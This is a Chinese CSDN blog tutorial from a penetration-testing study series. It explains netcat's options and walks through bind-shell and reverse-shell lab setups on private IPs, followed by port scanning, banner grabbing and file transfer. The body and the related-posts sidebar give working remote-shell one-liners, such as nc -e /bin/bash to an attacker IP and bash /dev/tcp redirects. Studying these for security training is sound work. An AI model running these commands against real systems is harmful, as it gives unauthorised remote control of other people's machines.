[ 隧道技术 ] 反弹shell的集中常见方式(一)nc反弹shell

已于 2022-09-03 22:34:13 修改
阅读量1.5k 收藏 46
点赞数 39
分类专栏: 渗透测试自学篇 轮播展示专栏 文章标签: nc 网络军刀 隧道技术 getshell 内网穿透
于 2022-08-03 08:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51577576/article/details/126128251
版权

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、反弹shell的常用方式

Netcat反弹
Powercat反弹
Bash反弹
Python反弹
还有telnet反弹shell,Java反弹shell,php反弹shell等等的
其实各种反弹shell的方式都是大同小异的
这篇文章来探讨一下netcat反弹shell

二、隧道技术之netcat反弹shell

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下:

-c 		指定连接后要执行的shell命令
		(windows的shell:c:window/system32/cmd.exe)
		(linux bin/bash)
		例:-c c:windows/system32/cmd.exe
		-c bin/bash
-e 		指定连接后要执行的文件名 
-k 		配置 Socket一直存活(若不想退出Shell后使监听断开可使用此参数) 
-l 		监听模式
-p 		设置本地主机使用的通信端口
-u 		使用UDP传输协议,默认为TCP
-v 		显示指令执行过程,用-vv会更详细
-z		多端口扫描时用

一、正向反弹Shell

正向反弹(必须互通):两台机器互通,攻击机主动发起攻击
Windows没有nc linux是自带nc的

1、实验拓扑

在这里插入图片描述

攻击机器 :192.168.3.27
目标靶机 :192.168.3.29

2、实验介绍

攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问,这个时候可以使用正向shell

3、实验复现

1)在靶机上运行:
nc -lvvp 1111 -e C:\Windows\System32\cmd.exe 		windows机器 
nc -lvvp 1111 -e /bin/bash 						linux机器

c指定连接后要执行的shell
l监听模式 vv详细的显示执行过程 p端口
e指定连接后要执行的文件名

在这里插入图片描述

2)在攻击机上运行
nc 192.168.3.29 1111

在这里插入图片描述

3)拿到正向的shell

在这里插入图片描述

二、反向反弹Shell

攻击机在公网,靶机在局域网,这种类型就必须用反向反弹shell
攻击机访问不了靶机,靶机可以访问攻击机

1、实验拓扑

在这里插入图片描述

攻击机器 :192.168.3.27
目标靶机 :192.168.3.29

2、实验介绍

攻击者机器 192.168.3.27 不能直接访问靶机,但是靶机 192.168.3.29 可以访问攻击者的机器,这个时候使用反向shell

3、实验复现

1)在攻击者机器运行
nc -lvvp 1111 监听1111端口
2)在靶机上运行 (反弹到公网)
nc -e C:\Windows\System32\cmd.exe 192.168.3.27 1111 	windos机器 
nc -e /bin/bash 192.168.3.27 1111 	linux机器
3)拿到反向的shell

在这里插入图片描述

三、Nc的其他用法

1、Banner 的抓取

靶机运行着ssh服务,可以查看服务的版本。

nc -nv IP Port(抓取ssh服务的banner信息)

在这里插入图片描述

2、端口探测

可以查看端口的开放情况

nc -v IP Port

在这里插入图片描述

多端口扫描: 
nc -v -z IP Port[1]-Port[65535]

在这里插入图片描述

3、端口监听

监听端口,当访问该端口会输出该信息

nc -l -p Port

在这里插入图片描述

4、文件传输

接受端:

nc -lp Port > 文件名

发送端:

nc -vn IP Port < 文件名 -q 1    (windows是-w,Linux是-q)
1、 接收端文件夹下为空

在这里插入图片描述

2、 接收端执行命令

在这里插入图片描述

3、 发送端执行命令

在这里插入图片描述

5、简易聊天

1、vps执行:
 nc -l -p Port

在这里插入图片描述

2、靶机执行:
nc -vn IP Port

在这里插入图片描述

6、连接远程主机

nc -nvv IP port
_PowerShell
关注
  • 39
    点赞
  • 46
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 20
    评论
专栏目录
订阅专栏
ngrok 公网映射
12-05
ngrok 本地映射外网访问教程全套,免费的,方便微信开发各种App开发
反弹Shell方法论,Windows篇
大河之犬的博客
10-10 467
使用它你可以轻易的建立任何连接。要创建Powershell反向Shell,黑客需要在目标系统上运行一个恶意的Powershell脚本,该脚本将与攻击者的服务器建立连接。Powershell反向Shell是一种常用的攻击技术,用于在目标系统上建立与攻击者控制的远程服务器之间的连接。Perl反向Shell是一种利用Perl编写的恶意脚本,用于建立与目标系统的反向连接。在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。
反弹shell的方法和场景
weixin_45653478的博客
04-01 616
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
linux反弹shell的原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shellnc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
nc--反弹shell
wzhua的博客
08-04 1947
nc--反弹shell,小实验
nc的使用+反弹shell
2301_80366980的博客
02-18 592
记录学习linux中nc的使用,以及反弹shell仅供个人学习,如有冒犯请尽快联系。
使用nc反弹shell方法
baidu_33260220的博客
05-08 6514
hacker机:192.168.1.1 目标机:192.168.1.2 1、在hacker机执行 nc -vlp 9999  (监听本机9999端口) 2、在目标机执行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1 成功反弹shell
《红蓝攻防对抗实战》七.常规反弹之利用NC在Linux系统执行反弹shell
热门推荐
一只特立独行的兔先森
10-24 2万+
假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell方式去进行穿透。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
详解NC反弹shell的几种方法
01-08
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc反向反弹shell 方法1:bash反弹 bash -i >& /dev/tcp/ip/port 0>&1 但首先需要在kali上使用
网络安全中反弹shell对详细描述的文章
最新发布
05-18
反弹shell
网络安全-反弹shell详解(攻击,检测与防御)
2401_84466336的博客
04-23 1750
1.1 什么是 ShellShell 在计算机系统中指的是一个用户界面,用于访问操作系统的服务。在网络安全中,攻击者常利用 Shell 来控制受害者的系统。1.2 反弹 Shell 的工作原理反弹 Shell 的基本原理是:攻击者在其自己的机器上设置监听端口,然后诱使受害者的机器执行一个反向连接的 Shell 命令,连接回攻击者的机器。这样,攻击者就能通过这个反向连接执行命令,控制受害者的计算机。
2024HW --> 安全产品 && Powershell无文件落地攻击
huohaowen的博客
04-14 1211
在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制...... 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)
常见工具 nc Wireshark反弹shell
代码审计
04-20 1107
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
NC(瑞士军刀反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 885
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
NC 反弹shell
08-30
NC反弹shell是一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使控制机器能够控制目标机器。 有几种方法可以实现NC反弹shell。其中一种是使用bash反弹,命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 请注意,这种方法需要在控制机器上执行。 另一种方法是使用NC命令进行反向连接,命令如下: ``` nc -e /bin/bash 192.168.0.4 7777 ``` 这种方法适用于在CentOS或Ubuntu上使用。 还有一种方法是使用php反弹shell,需要目标机器安装NC。命令如下: ``` bash -i &>/dev/tcp/ip/port 0>&1 ``` 同样,这种方法需要在控制机器上执行。 总而言之,NC反弹shell是一种通过建立反向连接实现对目标机器的控制的技术。可以使用不同的方法来实现反弹shell,如bash反弹和php反弹。这些方法需要根据具体情况和系统进行选择和执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [详解NC反弹shell的几种方法](https://download.csdn.net/download/weixin_38664159/14048091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [NC反弹shell的几种方法](https://blog.csdn.net/qq_59350385/article/details/124733038)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 20
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_PowerShell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值